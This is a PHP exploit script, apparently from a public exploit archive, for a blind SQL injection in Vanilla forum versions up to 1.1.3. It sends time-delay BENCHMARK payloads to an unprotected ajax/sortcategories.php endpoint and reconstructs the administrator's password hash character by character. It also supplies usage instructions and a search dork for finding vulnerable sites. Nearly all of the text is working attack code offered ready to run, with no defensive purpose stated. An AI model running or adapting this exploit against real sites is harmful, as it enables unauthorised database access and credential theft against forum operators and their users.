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Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit
=================================================== Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit =================================================== <?php ## Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit ## Requirements: MySQL >= 4.1, magic_quotes_gpc=Off ## Tested on versions 1.1.3, 1.1.2, 1.0.1 echo "------------------------------------------------------------\n"; echo "Vanilla <= 1.1.3 Remote Blind SQL Injection Exploit\n"; echo "dork: \"is a product of Lussumo\"\n"; echo "------------------------------------------------------------\n"; if ($argc<2) { echo "USAGE:\n"; echo "~~~~~~\n"; echo "php {$argv[0]} [url] OPTIONS\n\n"; echo "[url] - target server where Vanilla is installed\n\n"; echo "OPTIONS:\n"; echo "-p=<prefix> - use specific prefix (default LUM_)\n"; echo "-id=<id> - use specific user id (default 1)\n"; echo "-c=<count> - benchmark()'s loop count (default 300000)\n"; echo "-v - verbose mode\n\n"; echo "tip:\n"; echo "use bigger number of <count> if server is slow\n\n"; echo "examples:\n"; echo "php {$argv[0]} http://site.com/vanilla/ -p=forum_ -id=2\n"; echo "php {$argv[0]} http://forum.site.com:8080/ -c=400000\n"; die; } /** * Software site: http://lussumo.com/ * * Script /ajax/sortcategories.php is supposed to be used by admin to sort * the categories. However it isnt protected from unathorized users. Besides, * it doesnt properly sanitize user's input data, so we can inject the SQL * code into the UPDATE query. Script /ajax/sortroles.php is also vulnerable. */ error_reporting(0); set_time_limit(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",20); $url = $argv[1]; for($i=2;$i<$argc;$i++) { if(strpos($argv[$i],"=")!==false) { $exploded=explode("=",$argv[$i]); if ($exploded[0]=='-p') $prefix = $exploded[1]; if ($exploded[0]=='-id') $id = $exploded[1]; if ($exploded[0]=='-c') $benchmark = $exploded[1]; } elseif($argv[$i] == '-v') $verbose=true; } if (!isset($prefix)) $prefix = "LUM_"; if (!isset($id)) $id = 1; if (!isset($benchmark)) $benchmark = 300000; if (!isset($verbose)) $verbose=false; $url_parts = parse_url($url); $host = $url_parts['host']; if (isset($url_parts['port'])) $port = $url_parts['port']; else $port = 80; $path = $url_parts['path']; $query_pattern = "-99'+OR+IF(%s,BENCHMARK(%d,MD5(31337)),1)/*"; print "[~] Testing probe delays...\n"; $ok=true; $nodelay=0; $withdelay=0; for ($i=1;$i<=3;$i++){ $query = sprintf($query_pattern, "1=1", 1); $fdelay = get($query); if ($fdelay!==false) $nodelay+=$fdelay; else {$ok=false;break;} $query = sprintf($query_pattern, "1=1", $benchmark); $sdelay = get($query); if ($sdelay!==false) $withdelay+=$sdelay; else {$ok=false;break;} if ($sdelay<=($fdelay*2)) {$ok=false;break;} usleep($benchmark/1000); $delay=false; } if ($ok) { $nondelayed = $nodelay/3; print "[+] Average nondelayed queries response time: ".round($nondelayed,1)." dsecs\n"; $delayed = $withdelay/3; print "[+] Average delayed queries response time: ".round($delayed,1)." dsecs\n"; } else die("[-] Exploit failed\n"); print " Getting hash..."; if ($verbose) {print "\r[~]"; print "\n";} $hash=''; for($i=1; $i<=32; $i++) { $chr = gethashchar($i); if($chr!==false) $hash .= $chr; else { $chr = gethashchar($i); if ($chr !==false)$hash .= $chr; else die("\n[-] Exploit failed\n"); } } if (!$verbose) {print "\r[~]"; print "\n";} print "[+] Result: {$hash}\n"; function gethashchar ($pos) { global $query_pattern,$prefix,$id,$benchmark,$verbose; $inj = "ORD(SUBSTRING((SELECT+Password+FROM+{$prefix}User+WHERE+UserID={$id}),{$pos},1))"; $query = sprintf($query_pattern, $inj.">57", $benchmark*4); $success = condition($query); if (!$success) { if ($verbose) print "[v] Position {$pos}: char is [0-9]\n"; $min = 48; $max = 57; } else { if ($verbose) print "[v] Position {$pos}: char is [a-f]\n"; $min = 97; $max = 102; } for($i=$min;$i<=$max;$i++) { $query = sprintf($query_pattern, $inj."=".$i, $benchmark*4); $success = condition($query); if ($success) { $query = sprintf($query_pattern, $inj."<>".$i, $benchmark*4); $recheck = condition($query); if (!$recheck) { $chr = chr($i); if ($verbose) print "[v] Position {$pos}: char is {$chr}\n"; return $chr; } } } return false; } function condition($query) { global $delayed,$benchmark,$verbose; for($attempt = 1; $attempt <= 10; $attempt++){ $delay = get($query,true); if ($delay === false) { if ($verbose) print "[v] Attempt {$attempt}: error\n"; } else { if ($verbose) print "[v] Attempt {$attempt}: success (delay is {$delay} dsecs)\n"; break; } } if ($attempt == 10) die("[-] Exploit failed\n"); if($delay > ($delayed * 2)) { usleep(($benchmark*4)/1000); return true; } return false; } function get($query,$gethash=false) { global $host,$port,$path,$verbose; if ($gethash&&!$verbose) status(); $start = getmicrotime(); $ock = fsockopen(gethostbyname($host),$port); if (!$ock) return false; else { $packet = "GET {$path}ajax/sortcategories.php?CategoryID={$query} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "User-Agent: InAttack User Agent\r\n"; $packet .= "Connection: Close\r\n\r\n"; fputs($ock, $packet); $html=''; while (!feof($ock)) $html.=fgets($ock); $end = getmicrotime(); $exploded = explode("\r\n",$html); $errno=array(); preg_match('@(\d{3})@',$exploded[0],$errno); if ($errno[1]!=200) die("[-] Exploit failed\n"); } return intval(($end-$start)*10); } function status() { static $n; $n++; if ($n > 3) $n = 0; if($n==0){ print "\r[-]\r"; } if($n==1){ print "\r[\\]\r";} if($n==2){ print "\r[|]\r"; } if($n==3){ print "\r[/]\r"; } } function getmicrotime() {return array_sum(explode(" ", microtime()));} ?> # 0day.today [2024-12-26] #